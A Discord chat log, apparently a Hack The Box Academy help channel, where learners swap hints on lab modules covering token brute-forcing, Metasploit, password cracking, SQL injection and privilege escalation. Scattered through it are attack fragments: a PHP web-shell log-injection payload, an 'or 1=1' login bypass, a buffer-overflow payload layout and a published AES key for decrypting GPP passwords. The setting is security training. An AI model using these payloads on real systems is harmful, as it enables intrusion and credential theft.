fathom pendant
#

Do the Information Security Foundations path then

polar rain
#

I see, ok that makes sense, i started the bug bounty path and i though it will start from 0 but i guess not

#

ok thanks @fathom pendant

fathom pendant
#

Also -O should work

#

Don't know if you need the quotes though

haughty blade
#

Can u help me
@z3.solver

#

@languid dawn

fathom pendant
haughty blade
acoustic owl
#

Just say what you need help with.

fathom pendant
haughty blade
#

I want to learn.how to hack WiFi apensive

fathom pendant
#

Plenty of free resources on that

acoustic owl
fathom pendant
#

The closest you get is a blue team module on it

acoustic owl
acoustic owl
hallow kiln
#

you only need to pay the small price of 800 dollars

analog dock
acoustic owl
#

If it is about the question in which a token for the admin is created within +/-1 second, then you need to create another 2000 tokens.
For every millisecond one token. You can then test this token against the web application.
If it doesn't work, create the next token, and so on.

fathom pendant
#

If you look at the example screenshot and command, you should start there

#

Also spoilers in image

long flint
haughty blade
tidal kelp
fathom pendant
acoustic owl
fathom pendant
acoustic owl
fathom pendant
#

Honestly they even made the welcome thing the first thing people see when they join the server and people click through it

tidal kelp
fathom pendant
fathom pendant
sly dome
#

AHAHAHA

#

ok i stop now

acoustic owl
fathom pendant
deft knot
#

Anyone know how can I decrypt the AES encrypted string using this key? https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be

i have string like this edBSHOwhZLTjt/QS9FeJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ.
Key in the link is like this 4E9906E8FCB66CC9FAF49310620FFEE8F496E806CC057990209B09A433B66C1B
AES decryption services tell me that Length of secret key should be 32 for 256 bits key size

Tell me where I am stupid please

fathom pendant
#

If it's not related to an academy module, please refer to #welcome and #rules on how to access more of the server

sly dome
#

that is just an example

#

also the key is indeed 32 bits in hexadecimal

deft knot
sly dome
#

what is the reason to use encryption and then give the key to everyone

tidal kelp
fathom pendant
brazen badger
#

It's related to the solution you found in the question before that. Maybe you can use that in a search.

fathom pendant
#

Again you're thinking too narrow. You've technically already used a file of that type iirc from that section

rustic sage
#

@late crow check your dm

fathom pendant
#

But again reading the section tells you the different types

deft knot
tidal kelp
#

I'm so stuck..

fathom pendant
sly dome
edgy copper
#

Hi! Absollutely stuck inhttps://academy.hackthebox.com/module/112/section/1079 I see opened the RDP and closed the MSSQL ports.

fathom pendant
edgy copper
fathom pendant
#

Well maybe there's more open than you're seeing, did you do a full port scan of the target?

long flint
sly dome
#

na

#

you just use time.time() which defaults to UTC

acoustic owl
sly dome
#

just abuse the give time is UTC

#

given

#

you do not have to use the given time directly in the script to solve the question

acoustic owl
#

If you click the button with your script, then you know the exact time. Otherwise you have to use the time that is given. Because the token that is generated. +/- 1 second from the given time is generated.

sly dome
#

i was doing it a little dirty with curl <click button> && python3 script.py

#

🤣

haughty blade
#

Can any one make me a free logo?

acoustic owl
long flint
#

how long does the bruteforce normally take lol

acoustic owl
#

For 2001 tokens? Not very long

prime folio
sly dome
#

i did the button request with curl instead within the python script because lazyness

acoustic owl
#

Haha, you could have just clicked the button on the page. That would have been even lazier

sly dome
#

i was like maybe im slower HAHAHAHA

acoustic owl
#

Then you only have to transfer the time that is displayed into your script and run your script.

sly dome
#

that is done with datetime library?

tidal kelp
#

You get really humbled when you find the solution after this amount of time

#

and feel stupid ^^

fathom pendant
tidal kelp
#

Needs to keep reminding myself of paying attention to the details. both in the q and the text

fathom pendant
#

Yep this is why proper note taking is important, not just copy/paste word for word

tidal kelp
#

check

#

needs to get better at this

fathom pendant
#

Bc tbh learning how to parse fluff out of text is a super useful skill, word problems in math really help with that

edgy copper
fathom pendant
#

There's an important document to find before moving forward

long flint
#

i just wanna say i got the token now finally haha

#

thx for your help

edgy copper
fathom pendant
fathom pendant
nova wharf
nova wharf
fathom pendant
#

You're probably overthinking it, just use the http scripts as shown in the section

nova wharf
fathom pendant
#

No

#

Exploiting is not needed

#

Check the robots.txt of the webserver if I'm recalling right

#

Which is what the http script should do

plain coral
solid gate
#

In the Module "Using the Metasploit Framework" I cannot figure out the exact wording for the answer to the second question "Which version of Metasploit is free and can be used only through a CLI?"
Can someone help please?

nova wharf
#

I tried the robots.txt flag and it told me it wasn't correct

solid gate
#

The question is really basic but I'm still not sure if I should post the answers I tried here. I tried different casing also using one word or two words or an abbreviation. All to no avail.

fathom pendant
solid gate
#

Do they mean the actual executable, rather than the name of the product? 🤦‍♂️

#

Yeah, they do. That is a very frustratingly worded question!

#

Especially because in the question right above it, they asked for the name of the product.

#

But thanks @fathom pendant ! 🙂

fathom pendant
#

The answer is both

nova wharf
solid gate
# fathom pendant The answer is both

That's not clear from the text of the module, let alone the graphics. Most of the text speaks of "Metasploit Pro" vs "Metasploit Framework". At least at first. Later it seems to be used interchangably.

fathom pendant
solid gate
# fathom pendant Msf stands for Metasploit framework and then console

I know. But at least to me, the wording was misleading.
I may also just be a bit sore about those 0-cube questions in general. They feel like an unnecessary chore to me, because most can be answered without thinking and when they don't it tends to be a wording or case problem. That just feels anoying to me.
That being said. I am aware that my being annoyed by such a trivial thing is irrational and I'll shut up about it now. 🙂

wary creek
#

Hello, I have a question, I'm doing the brute force module and I need do to my first bruteforce attack to validate a question but I would like to do it on my own vm (parrot htb linux). they say that I can find a passwordlist on /opt/useful/SecLists/Passwords/Default-Credentials but there is nothing in my vm, I can only find it on the vm of the website

#

Did I miss something when I setted up my vm ?

sly dome
#

brute force module?

sly dome
wary creek
#

"LOGIN BRUTE FORCING"

sly dome
#

just git clone the repo somewhere in your system

wary creek
#

oh ok, there is nothing explained on this in the module

sly dome
#

or use it with cook

#

it is explained

wary creek
#

where can I find this seclist?

sly dome
#

re read

#

re read

fathom pendant
sly dome
#

you are 1 google search apart from the answer

wary creek
#

ok yes ty I found it

sly dome
#

any time

fathom pendant
wary creek
#

its the first time i do that ^^

fathom pendant
#

If you want to

#

Or you can git clone to your home directory

#

And just reference it from there in your commands

sly dome
#

how are you in the login brute force module

wary creek
fathom pendant
sly dome
#

i suggest you to do easier modules

sly dome
#

first understand the basics

wary creek
#

i already did the linux fundamental

sly dome
#

sure?

fathom pendant
#

Information Security Fundamentals is a good path to do

wary creek
#

i have the same error message on /opt

sly dome
#

you are asking questions that in my opinion you shouldn’t be asking if you could make your way to that module

lusty thicket
wary creek
#

or do I have to modify something?

sly dome
#

in previous modules of the cbbh path you had to use tools such as git clone

wary creek
#

oh ok it works now

fathom pendant
sly dome
#

ª

wary creek
#

I'm sorry for theses questions, i just didn't remembered all the module

fathom pendant
#

Not everyone doing modules is doing a learning path

fathom pendant
sly dome
#

but modules have prerequisites

#

at least fullfil those

fathom pendant
#

¯_(ツ)_/¯

wary creek
#

I think I have theses prerequisites I just never did a git clone before

sly dome
#

you asked about a permission denied

#

also knowing how to install tools from github is a prerequisite

fathom pendant
#

These are the only recommended pre-requisites for this module btw

wary creek
#

I did all theses modules

sly dome
#

permission denied error/solution is explained under Linux Fundamentals

wary creek
#

but they never ask to do a git clone

fathom pendant
#

Permission denied = probably need to be root

File not found = File does not exist in the path provided

sly dome
#

and i believe git clone is explained anywhere also

long flint
#

just want to confirm question from Username Injection where you need to reset the password to escalate from htbuser to htbadmin. This is also a bruteforce question right? as the steps dont work to reset the password without the old password

fathom pendant
#

Usually the sections go over how to install a tool if you don't already have it

#

Sometimes they don't

sly dome
long flint
#

okay, i solved it, but dont understand why it worked lol

#

because i reset the password once to get the full functionality and check the requests inside of burp, then following the module steps it didn't work

#

reset the box, did it as the first step, and it worked

sly dome
#

you have to send the username parameter twice

#

one for each user

#

and it is not sanitized

#

so it takes the oldpasswd parameter right for the htbuser but also processes it for the admin

tidal kelp
#

ayone else having trouble running ssh2john from the pwnboxes?

#

I get the following error:

solar arch
#

needs python <3.9

tidal kelp
#

wow cheers

fathom pendant
#

Python2 ssh2john

tidal kelp
#

should really be a disclaimer in module for that

fathom pendant
#

Eh for the most part it's not a huge issue, the major difference is that the function call for decoding got renamed from 2.7 > 3+

#

I mean you can always check C:\Users

#

That's weird let me check my answer

#

Ahhhh OK, read the provided hint

#

That should point you in the right direction

#

There was a section that talks about impersonating users

#

Don't forget to GO xD

fathom pendant
edgy copper
fathom pendant
# edgy copper No

Browse the files you have access to as a*. I don't recall if you can use the file explorer search feature to look for "important"

last quarry
#

Hi guys I'm reading the BufferOverflow in linux based

#

This calcul was made

#

Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
NOPs = "\x90" * 124
Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
EIP = "\x66" * 4'

#

Why NOPS is 124 ? In the previous section they didn't explain why

#

It's for the section "Generating shellcode"

#

I understand why 95 - 1040 - 4

#

but not the 124

weak stirrup
#

i dont understand the instructions in the C# assessment: Am I supposed to be GetAsyncing urls such as http://10.129.nnn.nnn/<item_from_wordlist_class>/ such as "http://10.129.100.100/foobarbaz/" i assumed this was what they are asking for and some of the urls would return a file listing from the web server.. i get nothing but 404.

tranquil axle
# last quarry Why NOPS is 124 ? In the previous section they didn't explain why

The exact number doesn’t matter too much, you want a bunch of nops before the shell code so that you have a bit of flexibility with the address you jump to. If you jump to any nop the cpu will slide down all the nops until it reaches the first real instruction. Otherwise you’d have to ensure you jump to the exact starting address of the shellcode. With a big nop sled you can guess the starting address easier and the exploit becomes more stable as a result. Technically you could do it with 0 nops

noble hazel
#

Hi everyone, need help with HTTP Attacks: Log Injection. I double encode the payload Malicious message from yahmasta (10.30.12.72): %3fphp system(_GET[cmd])%3b %3f but get the following response. PHP is not executing. Anyone has a nudge?

nova wharf
#

In the Firewall and IDS/IPS Evasion - Easy Lab (NMAP) its asking me to identify the OS and I came back with a linux machine in my results but it says its incorrect. this is the command I used to get those results: sudo nmap 10.129.2.80 -O --packet-trace -T2 --disable-arp-ping -D RND:10

frigid falcon
#

hello anyone can help me how to start with seasonal machins (visual) ?

upper lagoon
trail cave
#

Hi there! Could someone please explain to me why I only get the header when using cURL, but the whole request when doing the same request in Burp Suite?

#

I'm super confused... When using curl without '-i' I even dont get any feedback on my request.

sly dome
#

what code are you expecting to receive

#

i only see a json

#

object

trail cave
#

Yes, I'd like to receive the JSON file in curl too

sly dome
#

just do the plain get request

#

curl <url>

#

and check

trail cave
#

Tried already... Doesn't work unfortunately

#

nevermind

#

You were right... Could you explain shortly why that's the case?

#

I copied the original request in both the developer tools and burp suite. Both didn't give me the json object in their request

sly dome
#

you are sending some data through the GET request

#

and the server is not expecting ut

#

it

#

with the —data-raw

trail cave
#

Alright, and Burp Suite automatically doesn't send it when I changed it to a Get request?

sly dome
#

i think so

#

coz the json data below is from a POST

trail cave
#

Thanks Rafa! That's super helpful! 🙂

sly dome
#

any time dude

trail cave
sly dome
#

Burp can handle that automatically

trail cave
#

Perfect, thanks again for the help! Much appreciated!

sly dome
#

🙂

lusty thicket
#

hint: you don’t need the -O option

fathom pendant
#

Also linux is just the architecture, they're looking specifically for which linux, Ubuntu, Parrot, Kali, etc.

narrow solar
#

hey friends, hope you having good times, i am at Windows Privilege Escalation Citrix Breakout, already got to cmd, but i cant import modules with this error, do i have to deal with this or i have to find another thing to do, i cant do as told in the section because of it

strange pier
#

i am getting old with this 😦

lusty thicket
nova wharf
edgy copper
fathom pendant
#

Elevate privileges first

#

You have everything you need

edgy copper
wispy pulsar
#

Is a crypto module something to expect in the foreseeable future? Would be really helpful.

rustic sage
#

same here

valid nest
#

same

solar arch
rustic sage
#

rip

distant moat
#

bruh

solar willow
#

imagine this happens when taking the cpts

valid nest
#

All good. Because we will get a week. But I will get a heartattack.

leaden yew
#

SQL injection question:
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
Even if we used '1'='2' (which returns false), would this statement ultimately return true because the username admin exists?

high zinc
#

Since '1'='1' is always true, this last part is the same as true AND password = 'something'

#

which is the same as simply password = 'something'

#

if you change it to '1' = '2' which is false, you've got false AND password = 'something' which is always going to be false

#

because of your or which separates the last bits with the first bit, the only relevant part of that query is:
SELECT * FROM logins WHERE username='admin'

leaden yew
#

But the username='admin' evaluates to true, so it will always evaluate to true regardless of '1'='1'

#

AND operator is evaluted first.

high zinc
#

So yes, if admin exists, you'll get something back regardless of what the rest is, because of your or

leaden yew
#

gotcha. So the statement in the module below is kinda wrong?:
Since 1=1 always returns true, this query will return true, and it will grant us access.

#

In this context where we are using admin as the username?

thorn urchin
#

no

#

the 1=1 is to trick the password check

high zinc
#

I'm assuming the query is something like SELECT * FROM user WHERE username = 'admin' AND password = <your-input-here>

fathom pendant